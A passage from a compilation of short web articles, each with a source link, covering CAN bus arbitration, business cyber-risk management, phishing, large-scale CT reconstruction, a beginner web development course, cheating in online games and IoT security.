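    for bit in range(id_bits - 1, -1, -1):           # MSB is sent first
        wire = min((i >> bit) & 1 for i in contenders)  # dominant 0 wins
        contenders = {i for i in contenders if (i >> bit) & 1 == wire}
        if len(contenders) == 1:
            break
    return contenders.pop()

print(hex(arbitrate([0x1A4, 0x0F0, 0x6B2])))  # → 0xf0 (lowest ID wins)
```

This is also why lower CAN IDs are conventionally assigned to higher-priority messages.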
The maximum speed of the CAN bus, according to the international standard, is 1 Mbit/s (one million bits per second). The bit rate is the number of bits conveyed or processed per unit of time, and the achievable rate decreases as the length of the network increases.
The CAN bus standard provides an effective, universal standard for complex automotive control systems and industrial automation, as well as a reliable method for vehicles that use CAN bus to transmit data to external systems, improving the monitoring, management and maintenance of these assets.

Source: https://inseego.com/resources/fleet-glossary/what-is-can-bus/
What are the key technologies that can protect your business from cyber-attacks?
Most businesses would look for technologies such as threat detection, anti-malware, firewalls, and antivirus software. Just as important, though, are how often your systems are patched and what policies and procedures are in place.
However, the biggest threat to a business is likely to be something that they are not aware of. Remember the famous quote from US Secretary of Defence Donald Rumsfeld about the known unknowns and the unknown unknowns? He was talking about intelligence information, but his comment applies to any situation where the risks are unknown.
In the cyber security field, those with malicious intent are constantly dreaming up new ways to attack your business. They seek out vulnerabilities, so the threat landscape is constantly shifting. The only way to address this is to continually evaluate the risks to your business so that you can put appropriate mitigation and controls in place.
This is where the Information Security Manager comes in. They help businesses evaluate the threats they face. They can explain the company’s vulnerability to each type of risk and – perhaps their biggest challenge – what the potential impact is. While most people find it straightforward to grasp the impact of the office burning down, it can be much more difficult to grasp the full implications of a cyber-attack.
The shipping firm, Maersk, is a classic example. Infected by the NotPetya malware, its operations ground to a halt. While data was backed up, applications were not only infected but also destroyed so the data could not be restored. This led to fixed phone lines becoming inoperable, and contacts being wiped from mobiles because they had been synchronised with Outlook.
To minimise the risk of cyber-attacks, the Information Security Manager will present the risk framework to Senior Management, who can then make an informed decision about their company’s Risk Appetite i.e., the extent to which they wish to protect themselves against each risk, considering the company’s ethical stance, the legal frameworks it operates in and its security requirements. For example, the security requirements for a bank will be different from those for a construction firm.
The Information Security Manager then works across the business ensuring appropriate policies and controls are in place, educating people about security and then monitoring and ‘marking their homework’ to ensure that they comply. They would be responsible for explaining the risks and their implications and convincing members of staff of the importance of complying with security policies. They also need to be confident in what they know and be able to explain clearly why they are recommending a particular course of action.
Smaller organisations may choose to outsource the Information Security Manager role due to a skills gap. This has the advantage of bringing in an impartial third party, who may be better equipped to communicate the issues, and to ‘speak truth to power’ i.e., provide Senior Management with what may be unpalatable information about potential risks and the need to address them. But whether handled in-house or externally, the information manager is vital to effective cyber security.

Source: https://www.fordway.com/tackling-the-unknown-unknowns-of-cyber-security
Phishing over the web typically involves attempts to obtain personal information for malicious use. Unsolicited emails from unknown origins claiming that you have won a lottery or a sweepstakes contest are among the most common forms of phishing.
The people who send you these emails are merely after your personal information. They want details such as credit card numbers, bank account numbers, and other useful information they can exploit on the web, an open space for transactions that remains subject to the many security breaches most people know of today.
Some would even provide links to professionally designed pages, all the more deceiving a person into believing that the offer is real. But the next time you get such an e-mail from an unknown source, just think about it for a second: how can you win a contest from someone or something that you don't even remember joining? The rest is history.

Source: https://www.it-security-blog.com/tag/e-mails/
Computed tomography (CT) is a widely-used process in medicine and industry. Many X-ray images taken around a common axis of rotation are combined to create a three-dimensional view of an object, including the interior.
In medicine, this technique is commonly used for non-invasive diagnostic applications such as searching for cancerous masses. Industrial applications include examining metal components for stress fractures and comparing produced materials to the original computer-aided design (CAD) specifications. While this process provides invaluable insight, it also presents an analytical challenge.
State-of-the-art CT scanners use synchrotron light, which enables very fine resolution in four dimensions. For example, the Advanced Photon Source at Argonne National Laboratory can scan at micrometer-to-nanometer resolution and produce 2,000 4-megapixel frames per second. This results in 16 gigabytes of data produced each second. In describing the challenges of processing this amount of data, Tekin Bicer and colleagues use a high-resolution mouse brain dataset as an example. This dataset is composed of 4,501 slices and consumes 4.2 terabytes of disk space, and the reconstructed 3-D image weighs in at a whopping 40.9 terabytes.
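Those headline figures are easy to sanity-check. Assuming 16-bit (2-byte) pixels, a typical detector output depth (an assumption, since the article does not state it):

```python
frames_per_second = 2_000
pixels_per_frame = 4_000_000   # 4 megapixels
bytes_per_pixel = 2            # assumption: 16-bit detector output

rate_bytes = frames_per_second * pixels_per_frame * bytes_per_pixel
print(f"{rate_bytes / 1e9:.0f} GB/s")  # → 16 GB/s
```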
A single sinogram (an array of projections from different angles) from this dataset would take 63 hours to compute on a single core. This means the full dataset, comprised of 22,400 sinograms, would take a prohibitively long time to compute. GPUs can provide improved processing time, and vendors like NVIDIA have offerings specifically targeted at the medical CT market. However, the code tends to be device- and application-specific, which means a multi-purpose platform is better served by CPUs. This is particularly true for the massive datasets produced by synchrotron devices.
For more generally-applicable computation, the approach is one likely familiar to those who have performed large-scale computation. Bicer and colleagues developed a platform called Trace to provide a high-throughput environment for tomographic reconstruction. As a single-core environment is hardly a representative benchmark in 2017, their first step was to expand to multiple cores. They used machines with two six-core CPUs and tested with a subset of the mouse brain dataset described above. With a variety of combinations of processes and threads per process, they found that running two processes with 6 threads per process provided the best overall throughput (approximately 158 times faster than the single-core benchmark).
Expanding to multiple nodes provided an additional increase — a speedup factor of 21.6 when moving from 1 to 32 nodes. This also highlights another important consideration. The inter-node communication does not parallelize as well as the computation. This again will come as no surprise to the reader who has experience with parallel code execution. At eight nodes and above, the communication cost exceeds that of the computation. Where two nodes spent 19.7% of time on communication, that rose to 60.1% at 32 nodes. It’s unclear what interconnect was used for this study, but the 2.5 terabytes of inter-node communication performed for the computation in this subset argues strongly for a high-bandwidth, low-latency interconnect.
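The pattern reported here, in which computation parallelizes well while communication does not, can be illustrated with a toy strong-scaling model. The constants below are purely illustrative and are not fitted to the Trace measurements:

```python
def speedup(nodes, compute_time=1.0, comm_per_node=0.002):
    """Toy strong-scaling model: the compute term divides evenly across
    nodes, while the communication term grows linearly with node count.
    (Illustrative constants, not the paper's measured values.)"""
    total_time = compute_time / nodes + comm_per_node * nodes
    return compute_time / total_time

for n in (1, 2, 8, 32):
    print(f"{n:2d} nodes: speedup {speedup(n):5.2f}")
```

Past the point where the communication term dominates, adding nodes yields diminishing and eventually negative returns, which is what the rising communication percentages above describe.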
The specifics of tomographic data call for further optimization as well. Given the incredible size of the data, efficient use of CPU cache can provide a meaningful improvement in performance. However, the sinusoidal data access pattern of the reconstruction process results in high rates of cache misses — up to 75% in some cases. To address this, Xiao Wang and colleagues have worked on algorithmic approaches to transform the data prior to reconstruction. In their work, they observed a reduction in L2 cache misses from 75% to 17%. Given the large volume and long runtimes associated with large-scale computed tomography, any performance improvement is critical.
Computed tomography plays an increasing role in medical and industrial diagnostics. Argonne's Advanced Photon Source is currently capable of creating panoramas from multiple frames, resulting in datasets 100 times larger than the single-frame case. It's reasonable to expect that equipment will continue to increase in capability. As a result, high-throughput reconstruction environments will become ever more critical in providing results quickly.

Source: https://www.nextplatform.com/2017/02/27/scaling-compute-meet-large-scale-ct-scan-demands/
This article is contributed. See the original author and article here.
> This is based on the GitHub curriculum https://github.com/microsoft/Web-Dev-For-Beginners
There are 16 million developers in the world today. Roughly half of those, 8 million, are web developers. Web development is therefore a good skill to have as you are looking to land that first job and build a career in tech. But where do you begin to learn all that? With this learning path.
What even is programming? Well, it's a way to instruct your machine to do things for you. By running statements, you can do things like create a web page, a simple script, or even a computer game. The possibilities are endless. You do need some kind of text editor to type it all in; we provide that too in this first module.
Not everyone has perfect eyesight, sees the colors you do, or can see at all. As a developer you need to realize that when you build programs, you should include everyone. There are specific tags and approaches you can use to make your app usable by anyone, regardless of disability. Be inclusive and build better apps.
When you start out, you might have all your code statements in one file. But there is a way to organize your code so it becomes more readable and also reusable. You can create named blocks of code, called functions, which can be called whenever you need them to carry out a task for you.
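The curriculum itself teaches JavaScript, but the idea is language-independent; as an illustrative sketch in Python, a named function is defined once and reused:

```python
def greet(name):
    """A reusable, named block of code: call it whenever you need it."""
    return f"Hello, {name}! Welcome to web development."

print(greet("Ada"))    # → Hello, Ada! Welcome to web development.
print(greet("Grace"))  # → Hello, Grace! Welcome to web development.
```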
Your code can execute differently depending on the values of different variables or some other condition. Having that flexibility makes your application useful in many different scenarios. Learn about IF, ELSE and much more.
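For example (sketched in Python here; the curriculum uses JavaScript), a hypothetical ticket-pricing function can branch on the value of a variable:

```python
def admission_price(age):
    # The code executes differently depending on the value of `age`.
    if age < 5:
        return 0      # small children get in free
    elif age < 18:
        return 5      # reduced price for minors
    else:
        return 10     # full price for adults

print(admission_price(3))   # → 0
print(admission_price(12))  # → 5
print(admission_price(30))  # → 10
```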
Sometimes your data takes the form of a list. Imagine a recipe, an ice cream menu, or a receipt of items. Lists make it possible to store more than one thing, and there are constructs that make it possible to operate on lists and get what you need from them, such as their sum or the highest value.
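Continuing the ice-cream example (in Python for illustration; the numbers are made up), built-in constructs pull a sum or a maximum straight out of a list:

```python
scoops_sold = [12, 7, 30, 18, 25]   # daily sales from an ice cream stand

print(sum(scoops_sold))      # → 92 (total scoops)
print(max(scoops_sold))      # → 30 (best day)
print(sorted(scoops_sold))   # → [7, 12, 18, 25, 30]
```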
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.

Source: https://www.drware.com/web-development-for-beginners-a-new-learning-path-on-microsoft-learn/
By: I. Cvitić, M. Sai, D. Peraković
Cheating is simply another method of acquiring resources that enables players to get an advantage over their opponents. Cheating can be defined as an unfair advantage obtained by one player over another in violation of the game’s regulations. In single-player games, players do not have to contend with another player attempting to deceive them into a bad gaming experience. Cheats, which are frequently used in single-player games, enable the user to alter how the game is played. Some disable statistics to ensure that other players’ game experience is not impacted. Figure 1 illustrates several cheating techniques.
Cheating in online games may be done in various forms, ranging from the simplest to the most sophisticated. Some of the standard types of cheating techniques used by players are as follows [6-9]:
- Trust exploitation: Client-side cheating involves altering the game code, configuration data, or both on the client’s end of the transaction. A cheater may use computer software to change data in his game client and the game’s system files, then replace the older versions with new ones. Alternatively, code and data may be modified or replaced on the fly.
- Collaboration: In online games such as online bridge, a group of cheaters may band together to obtain an unfair edge over their honest opponents.
- Escaping: A cheater is just someone who takes advantage of the game’s functioning process. One frequent scenario that we have seen in many online games is escaping: when a cheater knows he is about to lose, he disconnects himself from the gaming system and runs away.
- Driver modification: The gamer may cheat by altering his operating system’s client infrastructure, such as device drivers. For instance, he might alter a graphics driver to render a wall transparent, allowing him to see through it.
- Denying service: The cheater sometimes floods the victim’s networks with bogus requests, causing the victim’s network connection to lag, preventing him from responding fast to the game, which causes other participants to remove the victim from the competition.
- Look-ahead cheat: A cheater sometimes delays his own move in online games so that he can see and analyze his opponent’s moves first.
- Lack of authentication: Sometimes the game server’s authentication protocols are not adequate; therefore, a cheater can obtain many user IDs belonging to different players. With fake user IDs, cheaters can easily impersonate legitimate players.
- Boosting: It is a form of collaboration in which the boosting party helps from the player’s level increase in order to earn in-game incentives.
- Experience selling: Certain players sell improved accounts, letting the buyer avoid having to work as hard to reach a specific level.
For individuals lacking technological expertise or the desire to modify the game, cheating can be accomplished through the use of in-game methods and game faults. Losing an online match might result in a player falling levels or receiving lower-level prizes. This occurs when it is clear that the player will lose, at which point the match is halted and the device is turned off to prevent the player from continuing. By flouting the established rules, this behaviour subverts the system and defrauds the winning player, who typically earns the match’s prize. Cheating through bugs and loopholes is a distinct form of cheating, so long as the player does so to circumvent the game’s completion requirements. A glitch enables players to bypass a significant chunk of the game in order to complete it faster or grab items that are not generally available. These exploits may be sold to other players in third-party markets rather than being obtained from the game provider.
Open research issues and challenges [10, 11]
- Different techniques need to be developed to identify game vulnerabilities that allow malicious users to introduce mods and manipulate various game resources.
- Preventing the exploitation of defects and vulnerabilities through anti-cheat codes in games that alter gameplay when an abnormality is detected.
- Detecting anomalous patterns or behaviors of users or a group of users and modifying their gaming as a result
- Using machine learning algorithms or fuzzy techniques, developing methods for detecting bugs in games.
- Maintaining the integrity of the game’s users’ identities through the use of various authentication techniques or identity checks of legitimate users and inventing new authentication methodologies.
- Ensuring effective data encryption during information exchange, and developing new encryption schemes that are difficult to crack, to secure data in transit between the client and server.
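As a minimal sketch of the anomaly-detection idea raised above (not any specific published method), per-player statistics can be screened with a z-score. The player data and the threshold below are made up for illustration; a production system would use more robust statistics than a simple mean and standard deviation:

```python
from statistics import mean, stdev

def flag_anomalies(stats, threshold=2.0):
    """Flag players whose statistic lies more than `threshold` standard
    deviations from the population mean."""
    values = list(stats.values())
    mu, sigma = mean(values), stdev(values)
    return {player for player, v in stats.items()
            if abs(v - mu) / sigma > threshold}

headshot_rate = {            # fraction of kills that are headshots
    "p1": 0.22, "p2": 0.25, "p3": 0.19, "p4": 0.24,
    "p5": 0.21, "p6": 0.23, "p7": 0.20, "p8": 0.97,  # suspiciously high
}
print(flag_anomalies(headshot_rate))  # → {'p8'}
```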
- Saudi, M. H. (2021). Gaming Mobile Applications: Proof of Concept for Security Exploitation. Turkish Journal of Computer and Mathematics Education (TURCOMAT), 12(8), 1761-1766.
- Boluk, S., & LeMieux, P. (2017). Metagaming: Playing, competing, spectating, cheating, trading, making, and breaking videogames (Vol. 53). U of Minnesota Press.
- Fox, J., Gilbert, M., & Tang, W. Y. (2018). Player experiences in a massively multiplayer online game: A diary study of performance, motivation, and social interaction. New Media & Society, 20(11), 4056-4073.
- Parizi, R. M., Dehghantanha, A., Choo, K. K. R., Hammoudeh, M., & Epiphaniou, G. (2019). Security in online games: Current implementations and challenges. In Handbook of Big Data and IoT Security (pp. 367-384). Springer, Cham.
- Yan, J., & Randell, B. (2005, October). A systematic classification of cheating in online games. In Proceedings of the 4th ACM SIGCOMM workshop on Network and system support for games (pp. 1-9).
- Sahoo, S. R., et al. (2020). Fake profile detection in multimedia big data on online social networks. International Journal of Information and Computer Security, 12(2-3), 303-331.
- Chaudhary, P., et al. (2019). A framework for preserving the privacy of online users against XSS worms on online social network. International Journal of Information Technology and Web Engineering (IJITWE), 14(1), 85-111.
- Gupta, S., et al. (2018). Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network. Future Generation Computer Systems, 79, 319-336.
- Sharma, Y., Bhargava, R., & Tadikonda, B. V. (2021). Named Entity Recognition for Code Mixed Social Media Sentences. International Journal of Software Science and Computational Intelligence (IJSSCI), 13(2), 23-36.
- Sahoo, S. R., et al. (2021). Multiple features based approach for automatic fake news detection on social networks using deep learning. Applied Soft Computing, 100, 106983.
- Lin, D., Bezemer, C. P., & Hassan, A. E. (2019). Identifying gameplay videos that exhibit bugs in computer games. Empirical Software Engineering, 24(6), 4006-4033.
Cite this article:
I. Cvitić, M. Sai, D. Peraković (2021), Cheating in Online Gaming, Insights2Techinfo, pp. 1

Source: https://insights2techinfo.com/cheating-in-online-gaming/
The original version of this article was published in Network Security Magazine's August 2019 edition and has been edited for brevity.
The impending IoT revolution poses a number of privacy concerns. The future network will have more connections between devices than between people, linking up everything ranging from the mundane such as refrigerator sensors, to the critical such as emergency response service. Networks have slowly shifted away from voice and towards data. The explosive growth of IoT will test the limits of both bandwidth and security.
Different devices have varying demands in terms of the volume and complexity of data, as well as importance. When systems are congested, a way of prioritizing the urgency of some data (medical devices for example) over others will be paramount, unless efficient service can be guaranteed consistently. The double-edged sword of data privacy is also of concern. While data has great commercial purpose, a breach can provide criminals with a wealth of logistical and personal information, which may be detrimental to businesses as well as individual users. The potential to mine sensitive data is also amplified in a complex IoT network.
Static sensors, many in remote locations, are an easy target for interception and denial-of-service attacks, which is even more worrisome when the sensors serve critical operations such as controlling reservoir volumes. IoT also carries the unique risk that connected SIMs are roaming and, despite improved connectivity, experience a delay between the point of activity and the point of reporting.
Lifecycle management is often overlooked, allowing many devices to remain stuck with outdated security software. Even a vulnerable smart toaster poses a fire hazard if correctly hacked. Manufacturers may be tempted to cut corners by equipping devices with inexpensive (and therefore vulnerable) sensor and monitor applications, despite a robust software platform. End-of-life management presents a challenge as SIM cards from devices no longer in use should also be recycled to avoid being put into unsuitable applications at great expense. Finally, changing ownership of devices such as used cars, which carry the owner’s history, present a data protection conundrum.
Because sufficient security was not initially built into networks, these problems have been addressed less efficiently only after the problem is demonstrated. As most networks include both old and new systems, IoT devices will likely be deployed on the older and less secure networks. Signalling firewalls are necessary to protect against the vulnerabilities present in current SS7 networks, and enhanced firewalls will be necessary for IoT communications. A firewall can be considered effective if it is able to inhibit denial of service, IoT SIM fraud and misuse, communication interception, and IoT device tracking.
Collective action among networks, manufacturers, industry associations, security experts, and regulating bodies is critical to allow IoT to thrive without becoming a risk. This requires honesty and diligence on the part of manufacturers. Enterprises must work closely with security experts to guarantee a minimum level of embedded network security and ensure protection against malicious attack. Specs should be included in IoT communication platforms that include a handshake for every session. Industry associations must demand a gold standard in IoT security to ensure cellular technology's future. Finally, governments and regulators must be committed to maintaining control and security of telecom networks should the industry in any way fail to effectively regulate itself, or should it leave networks, operators, and users open to risk. This is accomplished by instituting and enforcing minimum security requirements.
The looming prospect of this scale of connected devices is exciting, but we must mitigate the inherent risks or the entire industry may suffer significantly. Success will come about by careful and constant vigilance as well as a concerted effort to employ effective security measures at every stage of development.
Source: https://www.cellusys.com/2019/08/16/security-in-the-age-of-iot/